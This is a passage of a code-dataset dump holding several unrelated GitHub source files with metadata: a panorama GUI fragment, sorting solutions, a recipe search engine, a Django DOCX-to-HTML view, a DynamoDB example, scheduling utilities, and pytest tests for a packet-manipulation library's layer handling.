1\r\n        plt.imshow(result)\r\n        print(\"The panorama is saved in folder output!!!\")\r\n        cv2.waitKey(1)\r\n    else:\r\n        print(\"Could not perform\")\r\n        done = 0\r\n        lb_done = Label(window, text=\"Could not perform\", font=(\"Arial Bold\", 15), bg=\"black\", fg=\"red\")\r\n        lb_done.place(relx=0.5, rely=0.81, anchor=\"center\")\r\n    success(done)\r\n    cv2.waitKey(0)\r\n\r\nlabell.configure()\r\nlabell.pack(side=LEFT, ipadx=5, ipady=5)\r\n\r\nicon_start = PhotoImage(file='imp/pika.png')\r\nicon_start2 = icon_start.subsample(9, 12)\r\nbt21 = Button(window, text=\" Convert Now \", compound=LEFT, command=open_cv, fg=\"green\", font=(\"Arial Bold\", 25, \"bold\"))\r\nbt21.place(relx=0.5, rely=0.66, anchor=\"center\")\r\n\r\nicon_out = PhotoImage(file='imp/output.png')\r\nicon_out2 = icon_out.subsample(9, 12)\r\nbt211 = Button(window, image=icon_out2, compound=LEFT, text=\"Open Output Folder\", font=(\"Arial Bold\", 20), command=output_open)\r\nbt211.place(relx=0.5, rely=0.82, anchor=\"center\")\r\n\r\nwindow.mainloop()\r\n\r\n\r\n","repo_name":"MJLNSN/Panorama-Convertor-Image-Stitching","sub_path":"pano_now_with_gui.py","file_name":"pano_now_with_gui.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35670872709","text":"import sys\nimport heapq\ninput = sys.stdin.readline\nx = []\nn = int(input())\nfor i in range(n):\n    a, b = map(int, input().split())\n    heapq.heappush(x, [b, a])\n\nfor i in range(n):\n    t = heapq.heappop(x)\n    print(t[1], t[0])\n\n# fastest and most concise solution\nfrom sys import stdin, stdout\n\nstdout.write(\n    '\\n'.join(\n        f'{v % 1000000 - 100000} {v // 1000000 - 100000}'\n        for v\n        in sorted(\n            (int(line.split()[1])+100000) * 1000000\n            + int(line.split()[0])+100000\n            for line in stdin.read().splitlines()[1:]\n        )\n    ) + '\\n'\n)\n# second most concise and fast solution\nimport sys\ninput = sys.stdin.readline\ncoords = [input() for _ in range(int(input()))]\ncoords = sorted(coords, key = lambda coord: (int(coord.split()[1]), 
int(coord.split()[0])))\n\nprint(''.join(coords))","repo_name":"jjun-ni/jjun-ni","sub_path":"venv/정렬/11651.py","file_name":"11651.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"114538792","text":"import os\nfrom textblob import TextBlob\nimport string\nimport pandas as pd\nfrom nltk import word_tokenize, PorterStemmer\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport login\n\n\ndef clean(data):\n    cleaned_text = data.translate(str.maketrans('', '', string.punctuation + u'\\xa0'))\n    cleaned_text = cleaned_text.lower().translate(str.maketrans(string.whitespace, ' ' * len(string.whitespace), ''))\n    tokenized_text = word_tokenize(cleaned_text)\n    stop_word = {s: 1 for s in stopwords.words()}\n    remove_word = [word for word in tokenized_text if word not in stop_word]\n    remove_word = [word for word in remove_word if len(word) > 2]\n    ps = PorterStemmer()\n    stemmed_word = ' '.join([ps.stem(w) for w in remove_word])\n    return stemmed_word\n\n\ndef check_spell(query, query_type):\n    check = TextBlob(query).correct()\n    correct = str(check)\n    print(correct)\n    if query_type == 'title':\n        query_by_title(correct)\n    else:\n        query_by_ingredients(correct)\n\n\ndataset = pd.read_csv('/Users/zhuhongjin/大三下/953481_IR/assignment/IR_TermProject2/asset/archive/recipe.csv')\ndataset = dataset.drop(['Unnamed: 0', 'Ingredients'], axis=1)\ndataset = dataset.dropna()\ndataset = dataset.reset_index(drop=True)\ncleaned_title = []\ncleaned_ingredients = []\n\nfor i in dataset['Title']:\n    cleaned_title.append(clean(i))\n\nfor i in dataset['Cleaned_Ingredients']:\n    cleaned_ingredients.append(clean(i))\n\n\ndef query_by_title(input):\n    tfidfvectorizer = TfidfVectorizer(ngram_range=(1, 2))\n    title_invert = tfidfvectorizer.fit_transform(cleaned_title)\n    query = tfidfvectorizer.transform([clean(input)])\n    result = cosine_similarity(title_invert, query).reshape((-1,))\n    for i, index in enumerate(result.argsort()[-10:][::-1]):\n        end_result = dataset['Title'][index]\n        print(str(i + 1), dataset['Title'][index], \"--\", result[index], dataset['Image_Name'][index])\n    return end_result\n\ndef query_by_ingredients(input):\n    tfidfvectorizer = TfidfVectorizer(ngram_range=(1, 2))\n    title_invert = tfidfvectorizer.fit_transform(cleaned_ingredients)\n    query = tfidfvectorizer.transform([clean(input)])\n    result = cosine_similarity(title_invert, query).reshape((-1,))\n    for i, index in enumerate(result.argsort()[-10:][::-1]):\n        print(str(i + 1), dataset['Title'][index], \"--\", result[index])\n\n\nif __name__ == '__main__':\n    # login.app.run(host=os.getenv('IP', '0.0.0.0'), port=int(os.getenv('PORT', 3569)))\n    check_spell('mushro', 'title')\n    check_spell('sugar', 'ingredients')\n","repo_name":"Cosmos-52/IR_TermProject2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34107565867","text":"import os\r\nimport pypandoc\r\nfrom django.conf import settings\r\nfrom django.http import FileResponse\r\nfrom django.shortcuts import render\r\nfrom .models import Files\r\n\r\ndef save_and_convert(request):\r\n    if request.method == \"POST\":\r\n        # Get the uploaded file from the request\r\n        uploaded_file = request.FILES['document']\r\n\r\n        # Save the original file to the media directory\r\n        
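# Editorial note (comment added, not in the original view): the upload is\r\n        # written to disk first because pypandoc.convert_file() expects a path\r\n        # on the filesystem rather than an in-memory stream.\r\n        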
file_path = os.path.join(settings.MEDIA_ROOT, uploaded_file.name)\r\n with open(file_path, 'wb') as f:\r\n f.write(uploaded_file.read())\r\n\r\n # Convert the file to HTML using pypandoc\r\n html_output = pypandoc.convert_file(file_path, 'html', format='docx')\r\n\r\n # Save the HTML output to the media directory\r\n html_path = os.path.join(settings.MEDIA_ROOT, uploaded_file.name + '.html')\r\n with open(html_path, 'w', encoding='utf-8') as f:\r\n f.write(html_output)\r\n\r\n # Create a FileResponse object containing the HTML file\r\n download_path = os.path.join(settings.MEDIA_ROOT, uploaded_file.name + '.html')\r\n download_name = uploaded_file.name + '.html'\r\n response = FileResponse(open(download_path, 'rb'))\r\n response['content_type'] = 'application/octet-stream'\r\n response['Content-Disposition'] = 'attachment; filename=%s' % download_name\r\n\r\n return response\r\n \r\n return render(request, 'save_and_convert.html')\r\n","repo_name":"MarvelousAnkit/DJANGO-DOC-TO-HTML-CONVERTER","sub_path":"conversion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21487414660","text":"import boto3\nfrom pprint import pprint\n\n\ndef put_user(name, occupation, hobby, dynamodb=None):\n if not dynamodb:\n dynamodb = boto3.resource(\n 'dynamodb', endpoint_url=\"http://localhost:8000\")\n\n table = dynamodb.Table('Users')\n response = table.put_item(\n Item={\n 'name': name,\n 'occupation': occupation,\n 'hobby': hobby\n }\n )\n return response\n\n\nif __name__ == '__main__':\n user_resp = put_user(\"Thamires\", \"Student\", \"games\")\n print(\"Put user succeeded:\")\n pprint(user_resp, sort_dicts=False)\n","repo_name":"Thamires-Lopes/Hands-on-DynamoDB","sub_path":"CreateItem.py","file_name":"CreateItem.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"70742580649","text":"from django.utils import timezone\n\nfrom lesson.utils import get_date_time_from_datetime_timezone\n\n\ndef get_end_time_lesson(begin_time):\n \"\"\"Return end_time for a lesson, calculating from begin_time\n :type begin_time: string, format HH:MM\n :return : string, format HH:MM\"\"\"\n hour, minutes = begin_time.split(':')\n dt = timezone.datetime(2020, 1, 1, int(hour), int(minutes), 0) + timezone.timedelta(minutes=30)\n return dt.strftime('%H:%M')\n\n\ndef compose_schedule_data(orig_data, lessons_qs, time_zone, this_date_str):\n res_data = {'available': []}\n if orig_data:\n # first, order received schedule data\n av_list = sorted(orig_data, key=lambda item: item.get('beginTime'))\n else:\n av_list = []\n res_data['lessons'] = []\n for item in lessons_qs.all():\n date_str, time_str = get_date_time_from_datetime_timezone(item.get('scheduled_datetime'), time_zone)\n if date_str != this_date_str:\n continue\n else:\n res_data['lessons'].append({'id': item.get('id'), 'time': time_str})\n lesson_ind = 0\n qty_lesson = len(res_data['lessons'])\n for item in av_list:\n begin_time = item.get('beginTime')\n end_time = item.get('endTime')\n if lesson_ind < qty_lesson:\n lesson_begin_time = res_data['lessons'][lesson_ind].get('time')\n lesson_end_time = get_end_time_lesson(lesson_begin_time)\n else:\n res_data['available'].append({'beginTime': begin_time, 'endTime': end_time})\n continue\n\n # walk on lessons until reach one with some hour coincidence; case 1 in documentation\n while lesson_ind < 
qty_lesson and lesson_end_time <= begin_time:\n lesson_ind += 1\n if lesson_ind < qty_lesson:\n lesson_begin_time = res_data['lessons'][lesson_ind].get('time')\n lesson_end_time = get_end_time_lesson(lesson_begin_time)\n if lesson_ind == qty_lesson:\n res_data['available'].append({'beginTime': begin_time, 'endTime': end_time})\n continue\n\n # Here, there is some lesson to analyze\n # cases where lesson ends before availability end; cases 2, 3, 4 in documentation\n while lesson_ind < qty_lesson and lesson_end_time < end_time:\n if lesson_begin_time > begin_time: # case 4 in documentation\n res_data['available'].append({'beginTime': begin_time, 'endTime': lesson_begin_time})\n begin_time = lesson_end_time\n lesson_ind += 1\n if lesson_ind < qty_lesson:\n lesson_begin_time = res_data['lessons'][lesson_ind].get('time')\n lesson_end_time = get_end_time_lesson(lesson_begin_time)\n\n if lesson_ind < qty_lesson:\n if lesson_end_time == end_time and lesson_begin_time <= begin_time: # case 9 in documentation\n lesson_ind += 1 # get begin, end times of lesson is made at cycle beginning\n elif lesson_end_time > end_time and lesson_begin_time <= begin_time: # case 8 in documentation\n pass\n elif lesson_begin_time < end_time: # cases 5, 6 in documentation\n res_data['available'].append({'beginTime': begin_time, 'endTime': lesson_begin_time})\n if lesson_end_time == end_time: # case 5 in documentation\n lesson_ind += 1 # get begin, end times of lesson is made at cycle beginning\n else: # case 7 in documentation\n res_data['available'].append({'beginTime': begin_time, 'endTime': end_time})\n else:\n res_data['available'].append({'beginTime': begin_time, 'endTime': end_time})\n return res_data\n","repo_name":"iamvane/nabi_api_django","sub_path":"schedule/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32546951538","text":"import pytest\n\nimport actions.utils\nimport actions.trigger\nimport layers.packet\nimport layers.layer\nimport layers.tcp_layer\nimport layers.dns_layer\nimport layers.dnsqr_layer\nimport layers.udp_layer\nimport layers.ip_layer\nimport evolve\n\nfrom scapy.all import IP, TCP, UDP, DNS, DNSQR, Raw, DNSRR\n\n\ndef test_parse_layers():\n \"\"\"\n Tests layer parsing.\n \"\"\"\n pkt = IP()/TCP()/Raw(\"\")\n packet = layers.packet.Packet(pkt)\n layers_l = list(packet.read_layers())\n assert layers_l[0].name == \"IP\"\n assert layers_l[1].name == \"TCP\"\n\n layers_dict = packet.setup_layers()\n assert layers_dict[\"IP\"]\n assert layers_dict[\"TCP\"]\n\n\ndef test_get_random():\n \"\"\"\n Tests get random\n \"\"\"\n\n tcplayer = layers.tcp_layer.TCPLayer(TCP())\n field, value = tcplayer.get_random()\n assert field in layers.tcp_layer.TCPLayer.fields\n\n\ndef test_gen_random():\n \"\"\"\n Tests gen random\n \"\"\"\n for i in range(0, 2000):\n layer, field, value = layers.packet.Packet().gen_random()\n assert layer in [DNS, TCP, UDP, IP, DNSQR]\n\n\ndef test_dnsqr():\n \"\"\"\n Tests DNSQR.\n \"\"\"\n pkt = UDP()/DNS(ancount=1)/DNSQR()\n pkt.show()\n packet = layers.packet.Packet(pkt)\n packet.show()\n assert len(packet.layers) == 3\n assert \"UDP\" in packet.layers\n assert \"DNS\" in packet.layers\n assert \"DNSQR\" in packet.layers\n pkt = IP()/UDP()/DNS()/DNSQR()\n packet = layers.packet.Packet(pkt)\n assert str(packet)\n\n\ndef test_load():\n \"\"\"\n Tests loads.\n \"\"\"\n tcp = layers.tcp_layer.TCPLayer(TCP())\n load = tcp.gen(\"load\")\n pkt = 
IP()/\"datadata\"\n p = layers.packet.Packet(pkt)\n assert p.get(\"IP\", \"load\") == \"datadata\"\n p2 = layers.packet.Packet(IP(bytes(p)))\n assert p2.get(\"IP\", \"load\") == \"datadata\"\n p2.set(\"IP\", \"load\", \"data2\")\n # Check p is unchanged\n assert p.get(\"IP\", \"load\") == \"datadata\"\n assert p2.get(\"IP\", \"load\") == \"data2\"\n p2.show2()\n # Check that we can dump\n assert p2.show2(dump=True)\n # Check that we can dump\n assert p2.show(dump=True)\n assert p2.get(\"IP\", \"chksum\") == None\n\n pkt = IP()/TCP()/\"datadata\"\n p = layers.packet.Packet(pkt)\n assert p.get(\"TCP\", \"load\") == \"datadata\"\n p2 = layers.packet.Packet(IP(bytes(p)))\n assert p2.get(\"TCP\", \"load\") == \"datadata\"\n p2.set(\"TCP\", \"load\", \"data2\")\n # Check p is unchanged\n assert p.get(\"TCP\", \"load\") == \"datadata\"\n assert p2.get(\"TCP\", \"load\") == \"data2\"\n p2.show2()\n assert p2.get(\"IP\", \"chksum\") == None\n\n\ndef test_parse_load(logger):\n \"\"\"\n Tests load parsing.\n \"\"\"\n pkt = layers.packet.Packet(IP()/TCP()/\"TYPE A\\r\\n\")\n print(\"Parsed: %s\" % pkt.get(\"TCP\", \"load\"))\n\n strat = actions.utils.parse(\"[TCP:load:TYPE%20A%0D%0A]-drop-| \\/\", logger)\n results = strat.act_on_packet(pkt, logger)\n assert not results\n\n value = pkt.gen(\"TCP\", \"load\") + \" \" + pkt.gen(\"TCP\", \"load\")\n pkt.set(\"TCP\", \"load\", value)\n assert \" \" not in pkt.get(\"TCP\", \"load\"), \"%s contained a space!\" % pkt.get(\"TCP\", \"load\")\n\n\ndef test_dns():\n \"\"\"\n Tests DNS layer.\n \"\"\"\n dns = layers.dns_layer.DNSLayer(DNS())\n print(dns.gen(\"id\"))\n assert dns.gen(\"id\")\n\n p = layers.packet.Packet(DNS(id=0xabcd))\n p2 = layers.packet.Packet(DNS(bytes(p)))\n assert p.get(\"DNS\", \"id\") == 0xabcd\n assert p2.get(\"DNS\", \"id\") == 0xabcd\n\n p2.set(\"DNS\", \"id\", 0x4321)\n assert p.get(\"DNS\", \"id\") == 0xabcd # Check p is unchanged\n assert p2.get(\"DNS\", \"id\") == 0x4321\n\n dns = layers.packet.Packet(DNS(aa=1))\n assert dns.get(\"DNS\", \"aa\") == 1\n aa = dns.gen(\"DNS\", \"aa\")\n assert aa == 0 or aa == 1\n assert dns.get(\"DNS\", \"aa\") == 1 # Original value unchanged\n\n dns = layers.packet.Packet(DNS(opcode=15))\n assert dns.get(\"DNS\", \"opcode\") == 15\n opcode = dns.gen(\"DNS\", \"opcode\")\n assert opcode >= 0 and opcode <= 15\n assert dns.get(\"DNS\", \"opcode\") == 15 # Original value unchanged\n\n dns.set(\"DNS\", \"opcode\", 3)\n assert dns.get(\"DNS\", \"opcode\") == 3\n\n dns = layers.packet.Packet(DNS(qr=0))\n assert dns.get(\"DNS\", \"qr\") == 0\n qr = dns.gen(\"DNS\", \"qr\")\n assert qr == 0 or qr == 1\n assert dns.get(\"DNS\", \"qr\") == 0 # Original value unchanged\n\n dns.set(\"DNS\", \"qr\", 1)\n assert dns.get(\"DNS\", \"qr\") == 1\n\n dns = layers.packet.Packet(DNS(arcount=0xAABB))\n assert dns.get(\"DNS\", \"arcount\") == 0xAABB\n arcount = dns.gen(\"DNS\", \"arcount\")\n assert arcount >= 0 and arcount <= 0xffff\n assert dns.get(\"DNS\", \"arcount\") == 0xAABB # Original value unchanged\n\n dns.set(\"DNS\", \"arcount\", 65432)\n assert dns.get(\"DNS\", \"arcount\") == 65432\n\n dns = layers.dns_layer.DNSLayer(DNS()/DNSQR(qname=\"example.com\"))\n assert isinstance(dns.get_next_layer(), DNSQR)\n print(dns.gen(\"id\"))\n assert dns.gen(\"id\")\n\n p = layers.packet.Packet(DNS(id=0xabcd))\n p2 = layers.packet.Packet(DNS(bytes(p)))\n assert p.get(\"DNS\", \"id\") == 0xabcd\n assert p2.get(\"DNS\", \"id\") == 0xabcd\n\n\ndef test_read_layers():\n \"\"\"\n Tests the ability to read each layer\n \"\"\"\n 
packet = IP() / UDP() / TCP() / DNS() / DNSQR(qname=\"example.com\") / DNSQR(qname=\"example2.com\") / DNSQR(qname=\"example3.com\")\n packet_geneva = layers.packet.Packet(packet)\n packet_geneva.setup_layers()\n\n i = 0\n for layer in packet_geneva.read_layers():\n if i == 0:\n assert isinstance(layer, layers.ip_layer.IPLayer)\n elif i == 1:\n assert isinstance(layer, layers.udp_layer.UDPLayer)\n elif i == 2:\n assert isinstance(layer, layers.tcp_layer.TCPLayer)\n elif i == 3:\n assert isinstance(layer, layers.dns_layer.DNSLayer)\n elif i == 4:\n assert isinstance(layer, layers.dnsqr_layer.DNSQRLayer)\n assert layer.layer.qname == b\"example.com\"\n elif i == 5:\n assert isinstance(layer, layers.dnsqr_layer.DNSQRLayer)\n assert layer.layer.qname == b\"example2.com\"\n elif i == 6:\n assert isinstance(layer, layers.dnsqr_layer.DNSQRLayer)\n assert layer.layer.qname == b\"example3.com\"\n i += 1\n\ndef test_multi_opts():\n \"\"\"\n Tests various option getting/setting.\n \"\"\"\n pkt = IP()/TCP(options=[('MSS', 1460), ('SAckOK', b''), ('Timestamp', (4154603075, 0)), ('NOP', None), ('WScale', 7), ('md5header', b'abcd' * 8)])\n packet = layers.packet.Packet(pkt)\n assert packet.get(\"TCP\", \"options-sackok\") == ''\n assert packet.get(\"TCP\", \"options-mss\") == 1460\n assert packet.get(\"TCP\", \"options-timestamp\") == 4154603075\n assert packet.get(\"TCP\", \"options-wscale\") == 7\n packet.set(\"TCP\", \"options-timestamp\", 400000000)\n assert packet.get(\"TCP\", \"options-sackok\") == ''\n assert packet.get(\"TCP\", \"options-mss\") == 1460\n assert packet.get(\"TCP\", \"options-timestamp\") == 400000000\n assert packet.get(\"TCP\", \"options-wscale\") == 7\n pkt = IP()/TCP(options=[('SAckOK', b''), ('Timestamp', (4154603075, 0)), ('NOP', None), ('WScale', 7)])\n packet = layers.packet.Packet(pkt)\n # If the option isn't present, it will be returned as an empty string\n assert packet.get(\"TCP\", \"options-mss\") == ''\n packet.set(\"TCP\", \"options-mss\", \"\")\n assert packet.get(\"TCP\", \"options-mss\") == 0\n\n\ndef test_options_eol():\n \"\"\"\n Tests options-eol.\n \"\"\"\n pkt = TCP(options=[(\"EOL\", None)])\n p = layers.packet.Packet(pkt)\n assert p.get(\"TCP\", \"options-eol\") == \"\"\n p2 = layers.packet.Packet(TCP(bytes(p)))\n assert p2.get(\"TCP\", \"options-eol\") == \"\"\n p = layers.packet.Packet(IP()/TCP(options=[]))\n assert p.get(\"TCP\", \"options-eol\") == \"\"\n p.set(\"TCP\", \"options-eol\", \"\")\n p.show()\n assert len(p[\"TCP\"].options) == 1\n assert any(k == \"EOL\" for k, v in p[\"TCP\"].options)\n value = p.gen(\"TCP\", \"options-eol\")\n assert value == \"\", \"eol cannot store data\"\n p.set(\"TCP\", \"options-eol\", value)\n p2 = TCP(bytes(p))\n assert any(k == \"EOL\" for k, v in p2[\"TCP\"].options)\n\n\ndef test_compression_fallback(logger):\n \"\"\"\n Test that compression does not touch a packet without DNS in it packet\n \"\"\"\n pkt = UDP()\n p = layers.packet.Packet(pkt)\n p2 = layers.dns_layer.DNSLayer.dns_decompress(p, logger)\n assert p2 == p, \"dns_decompress changed a non DNS packet\"\n\n\ndef test_options_mss():\n \"\"\"\n Tests options-eol.\n \"\"\"\n pkt = TCP(options=[(\"MSS\", 1440)])\n p = layers.packet.Packet(pkt)\n assert p.get(\"TCP\", \"options-mss\") == 1440\n p2 = layers.packet.Packet(TCP(bytes(p)))\n assert p2.get(\"TCP\", \"options-mss\") == 1440\n p = layers.packet.Packet(TCP(options=[]))\n assert p.get(\"TCP\", \"options-mss\") == \"\"\n p.set(\"TCP\", \"options-mss\", 2880)\n p.show()\n assert len(p[\"TCP\"].options) 
== 1\n assert any(k == \"MSS\" for k, v in p[\"TCP\"].options)\n value = p.gen(\"TCP\", \"options-mss\")\n p.set(\"TCP\", \"options-mss\", value)\n p2 = TCP(bytes(p))\n assert any(k == \"MSS\" for k, v in p2[\"TCP\"].options)\n\n\ndef check_get(protocol, field, value):\n \"\"\"\n Checks if the get method worked for this protocol, field, and value.\n \"\"\"\n pkt = protocol()\n setattr(pkt, field, value)\n packet = layers.packet.Packet(pkt)\n assert packet.get(protocol.__name__, field) == value\n\n\ndef get_test_configs():\n \"\"\"\n Generates test configurations for the getters.\n \"\"\"\n return [\n (IP, 'version', 4),\n (IP, 'version', 6),\n (IP, 'version', 0),\n (IP, 'ihl', 0),\n (IP, 'tos', 0),\n (IP, 'len', 50),\n (IP, 'len', 6),\n (IP, 'flags', 'MF'),\n (IP, 'flags', 'DF'),\n (IP, 'flags', 'MF+DF'),\n (IP, 'ttl', 25),\n (IP, 'proto', 4),\n (IP, 'chksum', 0x4444),\n (IP, 'src', '127.0.0.1'),\n (IP, 'dst', '127.0.0.1'),\n (TCP, 'sport', 12345),\n (TCP, 'dport', 55555),\n (TCP, 'seq', 123123123),\n (TCP, 'ack', 181818181),\n (TCP, 'dataofs', 5),\n (TCP, 'dataofs', 0),\n (TCP, 'dataofs', 15),\n (TCP, 'reserved', 0),\n (TCP, 'window', 100),\n (TCP, 'chksum', 0x4444),\n (TCP, 'urgptr', 1),\n\n (DNS, 'id', 0xabcd),\n (DNS, 'qr', 1),\n (DNS, 'opcode', 9),\n (DNS, 'aa', 0),\n (DNS, 'tc', 1),\n (DNS, 'rd', 0),\n (DNS, 'ra', 1),\n (DNS, 'z', 0),\n (DNS, 'ad', 1),\n (DNS, 'cd', 0),\n (DNS, 'qdcount', 0x1234),\n (DNS, 'ancount', 12345),\n (DNS, 'nscount', 49870),\n (DNS, 'arcount', 0xABCD),\n\n (DNSQR, 'qname', 'example.com.'),\n (DNSQR, 'qtype', 1),\n (DNSQR, 'qclass', 0),\n ]\n\n\ndef get_custom_configs():\n \"\"\"\n Generates test configurations that can use the custom getters.\n \"\"\"\n return [\n (IP, 'flags', ''),\n (TCP, 'options-eol', ''),\n (TCP, 'options-nop', ''),\n (TCP, 'options-mss', 0),\n (TCP, 'options-mss', 1440),\n (TCP, 'options-mss', 5000),\n (TCP, 'options-wscale', 20),\n (TCP, 'options-sackok', ''),\n (TCP, 'options-sack', ''),\n (TCP, 'options-timestamp', 12345678),\n (TCP, 'options-altchksum', 0x44),\n (TCP, 'options-altchksumopt', ''),\n (TCP, 'options-uto', 1),\n #(TCP, 'options-md5header', 'deadc0ffee')\n ]\n\n\n@pytest.mark.parametrize(\"config\", get_test_configs(),\n ids=['%s-%s-%s' % (proto.__name__, field, str(val)) for proto, field, val in get_test_configs()])\ndef test_get(config):\n \"\"\"\n Tests value retrieval.\n \"\"\"\n proto, field, val = config\n check_get(proto, field, val)\n\n\ndef check_set_get(protocol, field, value):\n \"\"\"\n Checks if the get method worked for this protocol, field, and value.\n \"\"\"\n pkt = layers.packet.Packet(protocol())\n pkt.set(protocol.__name__, field, value)\n assert pkt.get(protocol.__name__, field) == value\n # Rebuild the packet to confirm the type survived\n pkt2 = layers.packet.Packet(protocol(bytes(pkt)))\n assert pkt2.get(protocol.__name__, field) == value, \"Value %s for header %s didn't survive packet parsing.\" % (value, field)\n\n\n@pytest.mark.parametrize(\"config\", get_test_configs() + get_custom_configs(),\n ids=['%s-%s-%s' % (proto.__name__, field, str(val)) for proto, field, val in get_test_configs() + get_custom_configs()])\ndef test_set_get(config):\n \"\"\"\n Tests value retrieval.\n \"\"\"\n proto, field, value = config\n check_set_get(proto, field, value)\n\n\ndef check_gen_set_get(protocol, field):\n \"\"\"\n Checks if the get method worked for this protocol, field, and value.\n \"\"\"\n pkt = layers.packet.Packet(protocol())\n new_value = pkt.gen(protocol.__name__, field)\n 
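# Editorial comment (added, not in the original): gen() draws a random\n    # legal value for the field; the set/get round trip below, plus a rebuild\n    # from raw bytes, checks that the value survives serialization.\n    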
pkt.set(protocol.__name__, field, new_value)\n assert pkt.get(protocol.__name__, field) == new_value\n # Rebuild the packet to confirm the type survived\n pkt2 = layers.packet.Packet(protocol(bytes(pkt)))\n assert pkt2.get(protocol.__name__, field) == new_value\n\n\n@pytest.mark.parametrize(\"config\", get_test_configs() + get_custom_configs(),\n ids=['%s-%s' % (proto.__name__, field) for proto, field, _ in get_test_configs() + get_custom_configs()])\ndef test_gen_set_get(config):\n \"\"\"\n Tests value retrieval.\n \"\"\"\n # Test each generator 50 times to hit a range of values\n for i in range(0, 50):\n proto, field, _ = config\n check_gen_set_get(proto, field)\n\n\ndef test_custom_get():\n \"\"\"\n Tests value retrieval for custom getters.\n \"\"\"\n pkt = IP()/TCP()/Raw(load=\"AAAA\")\n tcp = layers.packet.Packet(pkt)\n assert tcp.get(\"TCP\", \"load\") == \"AAAA\"\n\n\ndef test_restrict_fields(logger):\n \"\"\"\n Tests packet field restriction.\n \"\"\"\n layers.packet.SUPPORTED_LAYERS = [\n layers.ip_layer.IPLayer,\n layers.tcp_layer.TCPLayer,\n layers.udp_layer.UDPLayer\n ]\n tcpfields = layers.tcp_layer.TCPLayer.fields\n udpfields = layers.udp_layer.UDPLayer.fields\n ipfields = layers.ip_layer.IPLayer.fields\n\n layers.packet.Packet.restrict_fields(logger, [\"TCP\", \"UDP\"], [], [])\n assert len(layers.packet.SUPPORTED_LAYERS) == 2\n assert layers.tcp_layer.TCPLayer in layers.packet.SUPPORTED_LAYERS\n assert layers.udp_layer.UDPLayer in layers.packet.SUPPORTED_LAYERS\n assert not layers.ip_layer.IPLayer in layers.packet.SUPPORTED_LAYERS\n\n pkt = IP()/TCP()\n packet = layers.packet.Packet(pkt)\n assert \"TCP\" in packet.layers\n assert not \"IP\" in packet.layers\n assert len(packet.layers) == 1\n\n for i in range(0, 2000):\n layer, proto, field = layers.packet.Packet().gen_random()\n assert layer in [TCP, UDP]\n\n # Check we can't retrieve any IP fields\n for field in layers.ip_layer.IPLayer.fields:\n with pytest.raises(AssertionError):\n packet.get(\"IP\", field)\n\n # Check we can get all the TCP fields\n for field in layers.tcp_layer.TCPLayer.fields:\n packet.get(\"TCP\", field)\n\n layers.packet.Packet.restrict_fields(logger, [\"TCP\", \"UDP\"], [\"flags\"], [])\n packet = layers.packet.Packet(pkt)\n assert len(layers.packet.SUPPORTED_LAYERS) == 1\n assert layers.tcp_layer.TCPLayer in layers.packet.SUPPORTED_LAYERS\n assert not layers.udp_layer.UDPLayer in layers.packet.SUPPORTED_LAYERS\n assert not layers.ip_layer.IPLayer in layers.packet.SUPPORTED_LAYERS\n assert layers.tcp_layer.TCPLayer.fields == [\"flags\"]\n assert not layers.udp_layer.UDPLayer.fields\n\n # Check we can't retrieve any IP fields\n for field in layers.ip_layer.IPLayer.fields:\n with pytest.raises(AssertionError):\n packet.get(\"IP\", field)\n\n # Check we can get all the TCP fields\n for field in tcpfields:\n if field == \"flags\":\n packet.get(\"TCP\", field)\n else:\n with pytest.raises(AssertionError):\n packet.get(\"TCP\", field)\n\n for i in range(0, 2000):\n layer, field, value = layers.packet.Packet().gen_random()\n assert layer == TCP\n assert field == \"flags\"\n\n _, proto, field, value, _ = actions.trigger.Trigger.get_rand_trigger(None, 0)\n assert proto == 'TCP'\n assert field == \"flags\"\n layers.packet.Packet.reset_restrictions()\n layers.packet.SUPPORTED_LAYERS = [\n layers.ip_layer.IPLayer,\n layers.tcp_layer.TCPLayer,\n layers.udp_layer.UDPLayer\n ]\n\n with pytest.raises(AssertionError):\n layers.packet.Packet.restrict_fields(logger, [\"TCP\", \"IP\"], [\"notathing\"], 
[\"notathing\"])\n layers.packet.Packet.reset_restrictions()\n\n layers.packet.Packet.restrict_fields(logger, [\"TCP\", \"IP\"], [], [\"sport\", \"dport\", \"seq\", \"src\"])\n packet = layers.packet.Packet(pkt)\n packet = packet.copy()\n assert packet.has_supported_layers()\n assert len(layers.packet.SUPPORTED_LAYERS) == 2\n assert layers.tcp_layer.TCPLayer in layers.packet.SUPPORTED_LAYERS\n assert not layers.udp_layer.UDPLayer in layers.packet.SUPPORTED_LAYERS\n assert layers.ip_layer.IPLayer in layers.packet.SUPPORTED_LAYERS\n assert set(layers.tcp_layer.TCPLayer.fields) == set([f for f in tcpfields if f not in [\"sport\", \"dport\", \"seq\"]])\n assert set(layers.ip_layer.IPLayer.fields) == set([f for f in ipfields if f not in [\"src\"]])\n\n # Check we can't retrieve any IP fields\n for field in layers.ip_layer.IPLayer.fields:\n if field == \"src\":\n with pytest.raises(AssertionError):\n packet.get(\"IP\", field)\n else:\n packet.get(\"IP\", field)\n\n # Check we can get all the TCP fields\n for field in tcpfields:\n if field in [\"sport\", \"dport\", \"seq\"]:\n with pytest.raises(AssertionError):\n packet.get(\"TCP\", field)\n else:\n packet.get(\"TCP\", field)\n\n for i in range(0, 2000):\n layer, field, value = layers.packet.Packet().gen_random()\n assert layer in [TCP, IP]\n assert field not in [\"sport\", \"dport\", \"seq\", \"src\"]\n\n _, proto, field, value, _ = actions.trigger.Trigger.get_rand_trigger(None, 0)\n assert proto in ['TCP', 'IP']\n assert field not in [\"sport\", \"dport\", \"seq\", \"src\"]\n\n 